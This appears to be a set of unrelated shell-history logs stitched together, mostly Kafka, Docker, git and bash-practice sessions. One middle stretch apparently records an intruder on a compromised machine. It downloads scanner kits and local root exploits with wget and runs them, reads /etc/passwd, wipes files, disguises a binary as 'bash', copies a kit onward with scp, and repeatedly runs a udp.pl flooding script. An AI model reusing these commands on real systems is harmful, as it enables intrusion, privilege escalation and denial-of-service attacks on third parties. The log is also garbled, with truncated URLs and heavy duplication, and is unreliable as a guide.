+docker ps -ls +docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \`docker-machine active\`` --env ADVERTISED_PORT=9092 spotify/kafka +docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \`docker-machine active\`` --env ADVERTISED_PORT=9092 spotify/kafka +docker ps -ls +docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \`docker-machine active\`` --env ADVERTISED_PORT=9092 spotify/kafka +docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \`docker-machine active\`` --env ADVERTISED_PORT=9092 spotify/kafka +docker-machine ls +docker-machine ls +jps +jps +jps +jps +kill -9 38460 +ps -9 38460 +pkill -9 kafka +jps +start-hbase +bin/hbase version +stop-hbase +jps +kill -9 55973 +jps +start-hbase +bin/hbase shell +jps +jps +stop-kafka +stop-hbase +jps +jps -l +jps -l +jps -lvV +start-kafka +stop-kafka +jps +jps -l +start-kafka +stop-kafka +start-kafka +jps +start-kafka +jps +stop-kafka +jps +jps +stop-zookeeper +jps +start-zookeeper +jps +start-kafka +start-zookeeper +start-kafka +stop-kafka +jps +start-kafka +stop-zookeeper +ifconfig +java -version +bin/kafka-console-consumer.sh --bootstrap-server --topic test --from-beginning +bin/kafka-console-consumer.sh --bootstrap-server --topic test --from-beginning +bin/kafka-console-consumer.sh --bootstrap-server --topic test --from-beginning +bin/kafka-console-consumer.sh --bootstrap-server --topic test --from-beginning +bin/kafka-topics.sh --create --bootstrap-server l192.168.99.100:9092 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-console-consumer.sh --bootstrap-server --topic test --from-beginning +bin/kafka-console-consumer.sh --brocker-list --topic test --from-beginning +ls bin/ +bin/kafka-console-consumer.sh --zookeeper --topic test --from-beginning +bin/kafka-topics.sh --create --zookeeper l192.168.99.100:2181 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --zookeeper --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-console-consumer.sh --brocker-list --topic linkit_dangerous_driver --from-beginning +bin/kafka-console-consumer.sh --brocker-list --topic linkit_dangerous_driver --from-beginning +bin/kafka-console-consumer.sh --bootstrap-server --topic linkit_dangerous_driver --from-beginning +bin/kafka-topics.sh --zookeeper --delete --topic linkit_dangerous_driver +bin/kafka-console-consumer.sh --bootstrap-server --topic linkit_dangerous_driver --from-beginning +bin/kafka-topics.sh --zookeeper localhost:2181 --delete --topic linkit_dangerous_driver +bin/kafka-topics.sh --zookeeper localhost:2181 --delete --topic linkit_dangerous_driver +bin/kafka-topics.sh --bootstrap-server localhost:2181 --delete --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic linkit_dangerous_driver --from-beginning +bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic linkit_dangerous_driver --from-beginning +bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic linkit_dangerous_driver --from-beginning +bin/kafka-topics.sh --bootstrap-server localhost:9092 --delete --topic linkit_dangerous_driver +bin/kafka-topics.sh --zookeeper localhost:2181 --delete --topic linkit_dangerous_driver +bin/kafka-topics.sh --zookeeper localhost:2181 --delete --topic linkit_dangerous_driver +bin/kafka-topics.sh --bootstrap-server localhost:9092 --delete --topic linkit_dangerous_driver +bin/kafka-topics.sh --zookeeper localhost:9092 --delete --topic linkit_dangerous_driver +bin/kafka-topics.sh --zookeeper localhost:2181 --delete --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --bootstrap-server localhost:9092 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit-dangerous-driver +bin/kafka-topics.sh --create --bootstrap-server localhost:9092 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --bootstrap-server localhost:9092 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --zookeeper localhost:9092 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --zookeeper localhost:902181replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-topics.sh --zookeeper localhost:2181 --delete --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --bootstrap-server localhost:9092 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --zookeeper localhost:9092 replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --zookeeper localhost:2181 replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +sudo fuser -k 2181/tcp +jps +stop-zookeeper +stop-kafka +jps +pkill -9 kafka +jps +pkill -9 Kafka +jps +kill -9 68130 +jps +start-zookeeper +start-kafka +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit_dangerous_driver +bin/kafka-server-start.sh config/server.properties +bin/kafka-server-start.sh config/server.properties & +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit-dangerous-driver +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 2 --partitions 2 --topic linkit-dangerous-driver +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit-dangerous-driver +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit-dangerous-driver2 +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit-dangerous-driver2\ +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit-dangerous-driver2 +bin/kafka-topics.sh --create --bootstrap-server localhost:9092 --replication-factor 1 --partitions 1 --topic linkit-dangerous-driver2 +bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic linkit-dangerous-driver2 +alias start-kafka +echo $KAFKA_HOME +ls config/ +cat config/server.properties +cat config/server1.properties +ls config/ +cat config/server-1.properties +cat config/server.properties +cat config/server.properties +cat config/server-1.properties +alias start-kafka +sudo fuser -k 2181/tcp +jps +jps -l +pkill -9 zookeeper +jps +stop-zookeeper +stop-kafka +jps +pkill -9 kafka +jps +pkill -9 Kafka +jps +stop-kafka +jps +kill -9 74404 +jps +stop-kafka +jps +jps +kill -9 78281 +ls +bin/kafka-console-producer.sh --broker-list --topic test +bin/kafka-console-producer.sh --broker-list --topic test +bin/kafka-console-producer.sh --broker-list --topic test +bin/kafka-console-producer.sh --broker-list --topic test +start-zookeeper +bin/kafka-console-producer.sh --broker-list localhost:9092 --topic linkit_dangerous_driver +bin/kafka-console-producer.sh --broker-list localhost:9092 --topic linkit_dangerous_driver +docker-compose up +docker-compose up -d +docker-compose up -d +ls +mv buiddir/ builddir +ls +docker-compose up -d +touch +touch Dockerfile +vi Dockerfile +docker-compose up -d +docker-compose up -d +docker pull wurstmeister/kafka +docker-compose up -d +git clonestmeister/kafka-docker.git +docker-compose up -d +ls +git clonestmeister/kafka-docker.git +git pull +ls +docker-compose up -d +start-hbase +sudo cupsctl WebInterface=yes +tree +php artisan +exit +exit +yum install fuse-devel +yum install gcc +vi /etc/sysconfig/kernel +ls +grep -i fr * +env | more +export LANG=us_US.UTF-8 +man ls +yum install gcc +vi /etc/bashrc +grep LANG /etc/* +grep LANG /etc/* | less +vi /etc/locale.conf +reboot +yum search locale +yum install glibc-langpack-en* +man ls +man ls > /dev/null +yum search locale +yum search locale | grep us +yum search locale | less +pwd +grep kbd * +grep kbd */* +grep kbd */* | less +ls +ls +ls +grep localectl init.d/* +grep localectl init.d/*/* +grep localectl * +grep localectl * 2>/dev/null +grep localectl */* 2>/dev/null +ls +pwd +yum help +yum help | less +yum help +man id +ls +id +cat /etc/vconsole.conf +vi /etc/vconsole.conf +reboot +yum install mlocate +updatedb +env +man LANG +man LC_LOCATE +ls /usr/lib/locale/ +export LANG=en_US.UTF-8 +man ls +vi /etc/vconsole.conf +echo $LANG +vi /etc/locale.conf +reboot +df +ls /usr/include/fuse +poweroff +w +hostname +wget +wgets.home.ro/scan/b3ngos.tgz +ls -a +rm -rf * +rm -rf .* +ls +rm -rf * +rm -rf * +ls +rm -rf * +ls -a +rm -rf .* +ps axl +ps-x +ps -x +/sbin/ifconfig | grep inet +passwd +ps -x +uname -a +cat /etc/hosts +w +hostname +hostname +last -29 +last -20 +cat /etc/passwd +wgets.lycos.co.uk/b3ngos/quake.tar +cat /etc/issue +tar xzvf quake.tar +./cycmech +ps -x +ls +rm -rf * +uname 0a +uname -a +wget lica.uv.ro/local.tar.gz +tar xzvf local.tar.gz +./local +./local3 +./local1 +ls +rm -rf * +wgets.home.ro/udp.pl +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +195.2042 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +ls +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 6667 0 +perl udp.pl 6667 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +cat /proc/cpuinfo +hostname +hostname -f +cat /etc/hosts + /home/cvsroot/gentoo-src/rc-scripts/etc/hosts,v + /home/cvsroot/gentoo-src/rc-scripts/etc/hosts + /home/cvsroot/gentoo-src/rc-scripts/etc/ + /home/cvsroot/gentoo-src/rc-scripts/ +ls +perl udp.pl 53 0 +perl udp.pl 53 0 +w +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +ls +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +uname -a +uname -r +ls +wget members.lycos.co.uk/ipsrulz/b3ngos.tgz +tar xzvf b3ngos.tgz +./a +mv unixcod bengos +ls +chmod +x * +ls +./a 129.8 +ls +chmod +x * +ls +./a 66.235 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 6667 0 +perl udp.pl 6667 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl ud.pl 53 0 +perl udp.pl 0 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +w +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +ls +wgets.home.ro/mishu/mishu.jpg +tar xzvf b3ngos.jpg +tar xzvf mishu.jpg +ls +mv cycmech bash +chmod +x * +export PATH="." +bash +perl udp.pl 53 0 +perl udp.pl 53 0 +erl udp.pl 53 0 +perl udp.pl 53 0 +ls +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +ls +uname -a +uname -r +uname -a +cat /etc/issue +id +cat /etc/passwd +cat /etc/passwd +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +w +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl 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+perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +historyperl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +perl udp.pl 53 0 +wgets.home.ro/scan/b3ngos.tgz +scp b3ngos.tgz ldap@ +perl udp.pl 53 0 +perl udp.pl 53 0 +mcs *.cs -out:main.exe +mcs *.cs -out:main.exe +mcs *.cs -out:main.exe +mono main.exe +mcs *.cs -out:main.exe +mono main.exe +mono main.exe +mono main.exe +#1515492384 +pwd +#1515492392 +#1515492393 +ls +#1515492397 +pwd +#1515492408 +mkdir first_pro +#1515492413 +git init +#1515492427 +git remote add originstHaveACode/First_Pro +#1515492439 +git pull origin master +#1515492447 +git status +#1515492454 +ll +#1515492461 +vim test.txt +#1515492471 +pwd +#1515492474 +ls +#1515492523 +vim test.txt +#1515492554 +git status +#1515492556 +git add . +#1515492563 +git commit -m "first" +#1515492594 +git pull origin master +#1515492603 +git status +ls +vi /etc/hostname +hostname +hostname master +ls +ls +ls +vi script.yml +ls +mkdir server +ls +apt-get update +sudo apt-get update +sudo apt-get +sudo apt-get install +git --version +sudo apt install git +git --version +sudo apt-get install git-flow +ls +git init +git add README.md +git remote add originstr/igorechek.git +sudo git remote add originstr/igorechek.git +git --version +git config +git config --global user.name "v4str" +git config --global user.email "igorekmelnik@gmail.com" +git config --list +sudo git remote add originstr/igorechek.git +git init +git add readme.md +git commit -m "My first commit" +sudo git remote add originstr/igorechek.git +git push origin master +sudo git remote add originstr/igorechek.git +git init +sudo apt-get install apache2 +sudo ufw app list +sudo ufw status +sudo systemctl status apache2 +hostname +hostname -i +sudo ufw status +git status +git status +git push origin master +git init +sudo git add index.php +git init +git add readme.md +ls +git commit -m "first commit" +git remote add originstr/igorechek.git +git push origin master str/igorechek.git +git pull +git push origin master str/igorechek.git +git remote add originstr/igorechek.git +exit +ls +git --version +exit +ls +git init +git add main.php +sudo git add main.php +sudo git add "main.php" +ls +git --version +exit +ssh -l root lamp-web +ssh -l lamp-web root +exit +ls -al +mkdir .ssh +ssh-keygen -lf ./id_rsa.pub +ssh-keygen -t rsa -b 4096 +ls -al +exit +ls -al +chgrp jenkins id_rsa +ls -al +exit +defaults write com.apple.finder _FXShowPosixPathInTitle -bool true; killall Finder +MackintoshHD/Users/Lauren +Is +ls +sdrogers/programmingIT.git +git clonesdrogers/programmingIT.git +git clonesdrogers/programmingIT.git +git clonesdrogers/programmingIT.git +git clonehttps://github.com/sdrogers/programmingIT.git +git clonesdrogers/programmingIT.git +git pull master +git pull +/MSc Software Dev +~/MSc Software Dev +ls +~/MSc Software Dev +~/Programming +sdrogers/programmingIT.git +git pullsdrogers/programmingIT.git +git pull +$git remote add originsdrogers/programmingIT.git +$git remote -v +git remote add +git remote add programmingsdrogers/programmingIT.git +git pull origin +man cd +ls +git pull +git init +/etc/gitconfig +git config +.gitconfig +/gitcofig +/gitconfig +gitconfig +git config/etc/gitconfig +git config/gitconfig +~/Users/Lauren/MSc\ Software\ Dev/Programming +/Users/Lauren/MSc\ Software\ Dev/Programming +git config --global user.name "Lauren Ruddocks" +git config --global user.email laurenruddocks@gmail.com +git config --global core.editor sublime +git config --list +git init +ls +ls -F1 +git add *.c +git add AssEx1.java +git add LWMGUI.java +git add CustomerAccount.java +git add Wine.java +git add LICENSE +git commit -m 'initial AE1 version' +git status +git add AssEx1.class +git add CustomerAccount.class +git add LWMGUI.class +git add Wine.class +git add _classpath.xml +git add _project.xml +git status +git commit -m 'initial AE1 version' +git status +git status +git status +git commit -m 'version 2' +git add LWMGUI.java +git commit +git commit -m 'version 2' +git log +ls -a +.git +git pull +add git LWMGUI.java +add git 'LWMGUI.java' +git add 'LWMGUI.java' +git add 'AssEx1.java' +git add 'AssEx1.java' +git add 'LWMGUI.java' +git commit +git add 'AssEx1.java' +git commit +ls -a +open +open .git -e +open .git +open .git +git status +git status +git log +git commit -a +git add /Users/Lauren/MSc\ Software\ Dev/Programming/AE1/AssEx1.java +git commit +git add AssEx1.class +git commit +git commit -m 'version 3' +git add 'AssEx1.java' +git add 'LWMGUI.java' +git status +git commit +git log +git add 'AssEx1.java' +git commit +git status +git add AssEx1.java +git status +git commit +git add CustomerAccount.class +git add LWMGUI.class +git add Wine.class +git commit +git config --list +git config --global core.editor sublime +git commit +.gitignore +AE1.gitignore +.gitignore +git ignore +gitignore +sudo apt-get install sublime +export EDITOR=nano +git commit +git commit +git commit -m +git commit -a +git config --global core.editor"/Applications/Sublime\ Text.app" +git config -list +git config --list +git commit -a +git config --global core.editor"/Applications/Eclipse.app" +git config --list +git config --global core.editor "subl -n -w" +git config --list +git commit -a +git add AssEx1.java +git commit -a +git config --global core.editor sublime +git config --list +git commit -a +git config --global core.editor /Applications/Sublime\ Text.app +git commit -a +git commit +c +man ls +man ls +ls -c +ll -c +man ls +ls +ll +rm cutePuppyPics/ -rf +rm -rf cutePuppyPics/ +ll +rm npm-debug.log +ll +rm -rm react-checkbox-demo/ reactFullstack/ gulp-pluralsight-clean/ +ls +mkdir bash_practice +touch test +vi test +vi test +c +cat test +vi test +ls +ls +cat test +vi test +vi test +c +cat test +less test +c +less test +le +le +less test +file test +open test +file * +.. +ls +ls +mv gulpfile.js readme.md server.js bower.json ../bash_practice/ +.. +ls +mkdir node bower +mv gulpfile.js server.js node +ls +.. +ls +ll +file * +ls +man less +c +ls +ls +ll +mv *.jpg images +ls +mkdir images +mv *.jpg images/ +ls +ll images/ +man ls +ll -k images/ +open images/DaJie1.jpg +chrome test +firefox test +touch a +ls +touch A +ls +ls +mkdir toremove +mkdir hello world how are you +ls +mkdir dir +ls +rm * +rm -r * +ls +touch a b c e +.. +c +ls -R +ll -R +c +cp images/* bower +ls bower +ls +.. +ls +mkdir new +cp . new +cp * new +man cp +cp -R * new +ls +ls n +ls new +c +rm -r new +mkdir another +cp * toremove/ another/ +cp -R * toremove/ another/ +c +ls another/ +ls toremove/ +rm -f another/ +ls +mkdir hello +cp -R toremove/ hello/ +ls +.. +cp -R toremove/ hello22/ +cp -R toremove hello3 +ls hello3 +rm -r hello22/ hello3 +cp roremove hellow3 +cp toremove hellow3 +cp -R toremove hellow3 +ls hellow3 +man cp +cp -R toremove hellow3 +ls hello +ls hellow3/ +cp -R toremove hellow3 +ls hellow3/ +mv hellow3/ he3 +ls he3 +mkdir te +mv he3 te +ls te +ls +mv he/ . +mv he3/ . +ls he3/ +ls +c +ls +mv he3/* . +ls +ls he3/ +cp a he3/ +ls he3/ +mv * dist +ls +man mv +mv ./* demo +ls +man mv +mv a b +ls +mv c e +ls +mv toremove/ ano +ls +mv * dir +mv * he3/ +mkdir ../dist +mv * ../dist/ +ls +mv ../dist . +ls te +ls +ls -R dist +dist +rm -i a +rm -i dist/he3/a +ls +.. +rm -r te +rm -i a +rm -i a +ls +rm -im bower +rm -if bower +rm -ir bower +rm bower +rm -r bower +rm -ir node +cp -R toremove/ node +ls -R node +rm -ri node +ls r* +ls *r* +ls +c +ls *e +ls *r +ls +ls r* +ls i* +ls images/l* +man ls +ls -d *a* +ls n?d* +ls n?d* -d +ls -d n?d* + ls +ls +mkdir x y z +mv * +ls +ls z +ls -R z +rm -r * +ls +touch {a,b,c}.txt {d,e,f}.jpg +ls +touch {x,y}.ex +mkdir dir1 ir2 +ls +mv *{txt,jpg} ir2 +ls +ls ir2 +touch {a,b,c}{1,2,3}.txt +ls +rm * +ls +c +touch {a..c}.tex +ls +touch {a..e}{1..4}.tex +ls +rm * +touch mydocument-v{1..19}.doc +ls +rm mydocument-v[^789].doc + +rm mydocument-v?.doc +ls +rm mydocument-v?[^789].doc +ls +ls > a.txt +cat a.txt +ll >> a.txt +cat a.txt +cat b.json +touch b.txt +cat > c.json +cat c.json +vi c.json +less c.json +c +echo hello, world +echo hello, world >> c.json +less c.json +ls +echo *c +ls *c +echo a{1,5} > c.json +less c.json +echo a{1..20}.{txt,jsp} > c.json +ls c.json +echo a{1..20}.{txt,jsp} > c.json +ls c.json +cat c.json +ls +c +ls|less +ls +ls > ls.txt +cat ls.txt +echo hello $(whoami) +echo "hello $(whoami)" +echo hello ${whoami) > ls.txt ; sdfsdf; +echo hello $(whoami) > ls.txt +cat ls.txt +$(date) +echo $(date) +echo $(date) > ls.txt +echo hello $(whoami), $(date) > ls.txt +cat l +echo hello $(whoami), $(date) > ls$(date).txt +echo hello $(whoami), $(date) > "ls$(date).txt" +cat lsThu\ Jul\ 14\ 21\:10\:13\ EDT\ 2016.txt +rm lsThu\ Jul\ 14\ 21\:10\:13\ EDT\ 2016.txt +ls +echo $(hostname) +echo whoami +whoami +hostname +date +node -v +node -v +java -v +ls r* +ls i* +ls images/l* +man ls +ls -d *a* +ls n?d* +ls n?d* -d +ls -d n?d* + ls +ls +mkdir x y z +mv * +ls +ls z +ls -R z +rm -r * +ls +touch {a,b,c}.txt {d,e,f}.jpg +ls +touch {x,y}.ex +mkdir dir1 ir2 +ls +mv *{txt,jpg} ir2 +ls +ls ir2 +touch {a,b,c}{1,2,3}.txt +ls +rm * +ls +c +touch {a..c}.tex +ls +touch {a..e}{1..4}.tex +ls +rm * +touch mydocument-v{1..19}.doc +ls +rm mydocument-v[^789].doc +rm mydocument-v?.doc +ls +rm mydocument-v?[^789].doc +ls +ls > a.txt +cat a.txt +ll >> a.txt +cat a.txt +cat b.json +touch b.txt +cat > c.json +cat c.json +vi c.json +less c.json +c +echo hello, world +echo hello, world >> c.json +less c.json +ls +echo *c +ls *c +echo a{1,5} > c.json +less c.json +echo a{1..20}.{txt,jsp} > c.json +ls c.json +echo a{1..20}.{txt,jsp} > c.json +ls c.json +cat c.json +ls +c +ls|less +ls +ls > ls.txt +cat ls.txt +echo hello $(whoami) +echo "hello $(whoami)" +echo hello ${whoami) > ls.txt ; sdfsdf; +echo hello $(whoami) > ls.txt +cat ls.txt +$(date) +echo $(date) +echo $(date) > ls.txt +echo hello $(whoami), $(date) > ls.txt +cat l +echo hello $(whoami), $(date) > ls$(date).txt +echo hello $(whoami), $(date) > "ls$(date).txt" +cat lsThu\ Jul\ 14\ 21\:10\:13\ EDT\ 2016.txt +rm lsThu\ Jul\ 14\ 21\:10\:13\ EDT\ 2016.txt +ls +echo $(hostname) +echo whoami +whoami +hostname +date +node -v +node -v +java -v +c +vi .bash_profile +source .bash_profile +ls +vi .bash_profile +c +source .bash_profile +ls +ls +ll +source .bash_profile +ls +node -v +java --version +cat c.json +ls +c +ls|less +ls +ls > ls.txt +cat ls.txt +echo hello $(whoami) +echo "hello $(whoami)" +echo hello ${whoami) > ls.txt ; sdfsdf; +echo hello $(whoami) > ls.txt +cat ls.txt +$(date) +echo $(date) +echo $(date) > ls.txt +echo hello $(whoami), $(date) > ls.txt +cat l +echo hello $(whoami), $(date) > ls$(date).txt +echo hello $(whoami), $(date) > "ls$(date).txt" +cat lsThu\ Jul\ 14\ 21\:10\:13\ EDT\ 2016.txt +rm lsThu\ Jul\ 14\ 21\:10\:13\ EDT\ 2016.txt +ls +echo $(hostname) +echo whoami +whoami +hostname +date +node -v +node -v +java -v +c +vi .bash_profile +source .bash_profile +ls +vi .bash_profile +c +source .bash_profile +ls +ls +ll +source .bash_profile +ls +node -v +java --version +c +less ls.txt +c +cat .vimrc +cat .vimrc | grep jj +echo EDITOR +echo $EDITOR +ls +ls +c +bash --version +brew install fish +fish -v +ls +ls |grep fi +ls |grep fish +.. +c +chsh +ls +ls /usr/local +ls /usr/local/bin +chsh +fish +fish +res=5+3 +echo $res +./testing.sh list map test2 +./testing.sh list map test2 +./testing.sh list map test2 +./testing.sh list map test2 +./testing.sh list map test2 +./testing.sh list map test2 +./testing.sh list ws +./testing.sh list ws +./testing.sh list ws +./testing.sh list map test2 +./testing.sh list map test +./testing.sh add map test +./testing.sh add map test +./testing.sh list map test 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test_map_1 mapping.cfg +grep -iw test_map_1 mapping.cfg | sed -i 's/ENABLED/DISABLED/' +grep -iw test_map_1 mapping.cfg | sed -i 's/ENABLED/DISABLED' +grep -iw test_map_1 mapping.cfg | sed -i 's/ENABLED/DISABLED/G' +grep -iw test_map_1 mapping.cfg | sed -i 's/ENABLED/DISABLED/G' +grep -iw test_map_1 mapping.cfg | sed -i 's/ENABLED/DISABLED/g' +man sed +grep -iw test_map_1 mapping.cfg | sed 's/ENABLED/DISABLED/g' +grep -iw test_map_1 mapping.cfg | sed 's/ENABLED/DISABLED/' +exit +git status +git status +git add . +git commit -m "Added new snippets for ODI; Changed Look and Feel" +git push -u origin master +exit +ls +git status +./testing.sh list map test +./testing.sh add map test +./testing.sh list map test +./testing.sh disable map test +./testing.sh disable map test +./testing.sh list map test +./testing.sh delete map test +clear +./testing.sh list ws +./testing.sh delete ws test +./testing.sh delete ws test +./testing.sh list ws +./testing.sh list map test3 +./testing.sh list map test2 +./testing.sh add map test2 +./testing.sh add map test2 +./testing.sh list map test2 +./testing.sh disable map test2 test2_map_1 +./testing.sh list map test2 +./testing.sh list map test2 +./testing.sh disable map test2 test2_map_1 +./testing.sh disable map test2 test2_map_1 +./testing.sh disable map test2 test2_map_1 +./testing.sh disable map test2 test2_map_1 +./testing.sh list ws +./testing.sh list map test2 +./testing.sh enable map test2 test2_map_1 +./testing.sh enable map test2 +./testing.sh enable map test2 +./testing.sh enable map test2 test2_map_1 +./testing.sh enable map test2 test2_map_1 +./testing.sh enable map test2 test2_map_1 +./testing.sh enable map test2 test2_map_1 +./testing.sh list map test2 +./testing.sh disable map test2 test2_map_1 +./testing.sh list map test2 +./testing.sh disable map test2 test2_map_1 +./testing.sh list map test2 +./testing.sh delete map test2 test2_map_1 +./testing.sh list map test2 +./testing.sh delete map test2 test2_map_1 +./testing.sh delete map test2 test2_map_1 +./testing.sh delete map test2 test2_map_1 +./testing.sh list map test2 +git status +git log +git add . +git commit -m"Added DISABLE ENABLE functions to mapping.sh; Minor changes in ws.sh" +clear +git status +ls +mv testing.sh bookmark.sh +rm *~* +ls +rm *~ +rm *.un~ +touch sync.sh +exit +git status +git status +git status +git log +clear +git status +git add Packages/PKG_DAILY_REVENUE/ + +find -type f -name "*~* -exec rm {} \; + +find -type f -name "*~* -exec rm {} /; + + + +find -type f -name "*~* -print +find -type f -name "*~*" -exec rm {} \; +git status +git add . +git status +git commit -m "Latest snapshot" +clear +exit +git status +git log +exit +ls +ls +mv ER_FTP_DIRS_PNG.cnf ftp_dirs.cfg +ls +mv ER_TYPES_PNG.cnf er_types.cfg +ls +mv ER_LOG_ARCH_DIRS_PNG.cnf log_arch_dirs.cfg +ls +ls +ls +mv ER_TYPES_FIJI.cnf er_types.cfg +mv ER_FTP_DIRS_FIJI.cnf ftp_dirs.cfg +ls +rm LOAD_ER_ODI_FIJI.sh +ls +rm ER_LOG_ARCH_DIRS_FIJI.cnf log_arch_dirs.cfg +mv ER_LOG_ARCH_DIRS_FIJI.cnf log_arch_dirs.cfg +ls +ls +ls +mv ER_LOG_ARCH_DIRS_SAM.cnf log_arch_dirs.cfg +mv ER_TYPES_SAM.cnf er_types.cfg +ls +mv ER_FTP_DIRS_SAM.cnf ftp_dirs.cfg +ls +ls +mv ER_TYPES_TON.cnf er_types.cfg +mv ER_LOG_ARCH_DIRS_TON.cnf log_arch_dirs.cfg +ls +ls +ls -ltr +ls * +mv van/ER_LOG_ARCH_DIRS_VAN van/log_arch_dirs.cfg +mv van/ER_TYPES_VAN van/er_types.cfg +ls +ls * +ls * +mv fiji/ER_LOG_ARCH_DIRS_FIJI.cnf log_arch_dirs.cfg +ls +mv log_arch_dirs.cfg fiji/ +ls +ls * +find -type f -name "ftp_dirs.cfg" print +find ./ -type f -name "ftp_dirs.cfg" print +find . -type f -name "ftp_dirs.cfg" print +find . -type f -name "ftp_dirs.cfg" +find . 